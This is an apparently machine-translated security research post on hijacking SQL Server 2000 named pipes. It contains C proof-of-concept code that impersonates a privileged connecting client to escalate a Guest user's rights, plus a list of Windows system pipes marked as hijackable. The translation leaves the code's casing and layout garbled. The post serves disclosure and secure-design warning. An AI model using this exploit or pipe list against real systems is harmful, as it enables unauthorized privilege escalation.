SQL SERVER 2000 Communication Pipeline post-_mssql hijacking

Author: Flashsky
SITE:WWW.XFOCUS.NET
Mail: flashsky@xfocus.org

In SQL SERVER 2000 communication, a well-known pipe is allowed to communicate, and is typically named:
Default instance: \\.\pipe\sql\query
Named instance: \\.\pipe\mssql$instancename\sql\query
You can also use 1434 UDP to query for this pipe name

However, since SQL SERVER 2000 is set to NULL for the ACL on this pipeline, any user's permissions can hijack the pipeline, and previous hijacking takes place by first stopping the service, then creating the name pipe, and then starting the service to use the pipe that has already established the name. But in fact, SQL SERVER 2000 will determine if a pipe with the same name exists. Then it takes another name, and the user with the low-level permissions starts and stops the service (unless it exploits some vulnerabilities), but the actual test of the pipe finds that, if the ACL is set to NULL, even the later named pipe, You can also hijack the first command of the pipe, simply reuse the pipe, and then set up a few of the connections themselves without releasing the connection (specifically to build a few estimates and real pipes
Establishment of the number of instances, such as in my test, \\.\pipe\sql\query only need to establish 1 can be hijacked, and \\.\pipe\lsass will need 4-5 before hijacking. However, \\.\pipe\lsass ACLs can only be hijacked by administrators.
If an attacker has reused a pipe of the same name, set up several pipelines that are not freed (consuming instances of normal piping), and then a customer-initiated pipeline connection enters the process of the attacker's pipeline monitoring, and the rest is the cliché of using the impersonation function to get the initiator's privileges:
The following is a simple example of hijacking SQL SERVER 2000 pipeline Traffic
Environment: SQL SERVER 2000+SP2
WIN2000 Server Chinese version +sp3
Test process:
1. Create SQL Server to allow pipeline communication, and Integrated Windows authentication, add a highly privileged Windows native account that allows SQL Server to log in, start SQL Server service
2. C disk set up a TEST.TXT file, set ACL for the guest all refused, the other people are allowed
3. On another machine B, log on to the added server account that can log on to SQL Server, and then set the client network library to be a pipe only (if there are more than one, it might be a randomly selected connection, not definitely a conduit for communication).
4. Then use SQL Server Enterprise Manager to establish a connection to SQL Server, using Integrated Windows authentication
5. The machines on this side of SQL Server go to the Guest account run the following C code program, will show that the TEST.TXT file cannot be opened first, then hijacked, waiting for the client pipeline connection
6. On machine B, connect SQL SERVER, then host A's program intercepts the pipe as a high power login user, and then opens the file without permission to open first.

Of course, the actual meaning of this attack itself may not be significant, because it is estimated that SQL Server is now using pipeline to establish a relatively small number of communications, and in all cases, it is generally active to choose the TCP way to connect, but also explained: a lack of good ACL protection of the pipeline, can also be used for hijacking, This reduces the number of challenges that need to be discontinued or predicted beforehand, and must be careful when writing server-side piping applications.

SQL SERVER 2000 Hijacking code

#include <windows.h> #include <winbase.h> #include <stdio.h> #include <stdlib.h> void Main () {
  HANDLE Pipea;
  FILE * FP;
  DWORD ret;
  DWORD num;
  HANDLE pipeb[100];
  int i;
  int dwsize;  
  Char szuser[256];
    DWORD dwnumber = 0;
  First Test, unable to open this file under guest permissions fp = fopen ("C:\\Test.txt", "w");
  if (fp==null) printf ("Now you don ' t open file;\n"); Establishes a pipe with the same name, reusing the existing SQL Server Pipea = createnamedpipe ("\\\\.\\pipe\\sql\\query", Pipe_access_duplex, Pipe_type_m essage|

  Pipe_wait, 2048, 2048, nmpwait_use_default_wait, NULL);
    if (Pipea ==invalid_handle_value) {ret = GetLastError ();
    printf ("Error in createnamedpipe!code=%d\n", ret);
  Return
    //loss of other normal instances if (Waitnamedpipe ("\\\\.\\pipe\\sql\\query", Nmpwait_wait_forever) ==0) {printf ("No this pipe\n");
  Return
    //Can adjust the number, SQL Server only needs to adjust one to be able to (i=0;i<1;i++) {sleep (20); if (Pipeb[i]=createfile ("\\\\.\\pipe\\sql\\query", Generic_write| generic_read,0, (Lpsecurity_attributes) Null,open_existing,file_attribute_normal, (HANDLE) NULL) ==INVALID_HANDLE_
      VALUE) {printf ("Open pipe failed\n");
    Return
    }//writefile (Pipeb[i], "test1", 5,&num,null);
  WriteFile (Pipeb[i], "test2", 5,&num,null);
  }//Then wait for connection connectnamedpipe (Pipea, NULL);
    ReadFile (Pipea, (void *) &dwnumber, 4, &dwsize, NULL);
  Simulate the incoming user impersonatenamedpipeclient (PIPEA);
    dwsize = 256;
  Obtain user Information GetUserName (szuser, &dwsize);  
    printf ("Impersonating:%s\n", szuser);
  Then test to see if the file can be opened, proving that it did elevate the permissions fp = fopen ("C:\\Test.txt", "w");
  if (fp!=null) printf ("Now can open file\n");
  Disconnectnamedpipe (PIPEA);
  CloseHandle (PIPEA);  
  for (i=0;i<1;i++) CloseHandle (Pipeb[i]);
Return  }

Add:
All pipelines have this vulnerability, which is to see if the ACL allows you to reuse, as long as it can be reused
I can hijack a//./pipe/lsass, but his ACL is defined as being hijacked only by the administrator.
Currently tested some of the default duct basic ACL settings Well, do not allow low-level permissions user replication, but the SQL pipeline display ACL settings are very poor
There may be more services or other third party services where there are no good ACL-protected pipelines, which means that reuse can also hijack success

Here's what I've started with all the default win services, and then get the results of the system pipeline test (not open Terminal Services, my machine is not installed, installed Terminal Services can be measured), also can not say meaningless, I saw an article is also specifically recommended to use integrated verification and pipeline communication to obtain a more secure SQL What about the server, hey?
Pipe name (number of instances, Maximum instances)

Initshutdown (2,-1) <---------------can be hijacked under admin
Net\ntcontrolpipe5 (1, 1)
LLSRPC (2,-1) <---------------can be hijacked under admin
000001e8.000 (2,-1) <-----------can be hijacked under admin
Net\ntcontrolpipe8 (1, 1)
Net\ntcontrolpipe9 (1, 1)
PROFMAPAPI (2,-1) <--------------can be hijacked under admin
Epmapper (2,-1) <----------------can be hijacked under admin
wmiep_454 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
wmiep_444 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
NET\NTCONTROLPIPE11 (1, 1)
WMIEP_3C8 (2,-1) <---------------can be hijacked under admin
Net\ntcontrolpipe12 (1, 1)
Net\ntcontrolpipe13 (1, 1)
NDDEAPI (2,-1) <-----------------can be hijacked under admin <------Guest users can hijack
NetDDE (1, 1) returns a busy error message for all pipe instances and does not know whether ACL settings permit reuse
NET\NTCONTROLPIPE14 (1, 1)
winsock2\catalogchangelistener-e8-0 (1, 1) <-----------------can be hijacked under admin
NET\NTCONTROLPIPE15 (1, 1)
winsock2\catalogchangelistener-574-0 (1, 1) <-----------------can be hijacked under admin
wmiep_640 (2,-1) <-----------------can be hijacked under admin
winsock2\catalogchangelistener-640-0 (1, 1) <-----------------can be hijacked under admin
Net\ntcontrolpipe25 (1, 1)
WMIEP_6F0 (2,-1) <-----------------can be hijacked under admin
Sql\console (1,-1) <---------------can be hijacked under admin <------Guest users can hijack
Sql\query (1,-1) <-----------------can be hijacked under admin <------Guest users can hijack
Net\ntcontrolpipe26 (1, 1)
Tsx_listener (1, 1) returns a busy error message for all pipe instances and does not know whether ACL settings permit reuse
WinReg (2,-1) <-----------------can be hijacked under admin
winsock2\catalogchangelistener-6f0-0 (1, 1) <-----------------can be hijacked under admin

which can be hijacked under guest permissions
wmiep_454 (2,-1) <---------------can be hijacked under admin <------Guest user can hijack
wmiep_444 (2,-1) <---------------can be hijacked under admin <------Guest users can hijack
Nddeapi (2,-1) <-----------------can hijack < under admin------ Guest users can hijack
Sql\console (1,-1) <---------------can be hijacked under admin <------Guest users can hijack
Sql\query (1,-1) <------ -----------can hijack the <------The Guest user can hijack the
SQL without saying, but sql\console this pipeline is not clear about what, if there are some uses of the default, it is also estimated to be a point.
Nddeapi's basic presence NDDEAPI application can occur
WMI's difficult, look at this as the development of each connection will be built up, so the post-reuse effect is not much, can only be used to predict the name of the method in advance to attack, but it is strange that the permissions are different, Some WMI can not be used for guest reuse, and some may, have time to specifically test the WMI client and server connection between the pipeline traffic generated by the situation, perhaps also take a default pipe name, might be able to attack it,:)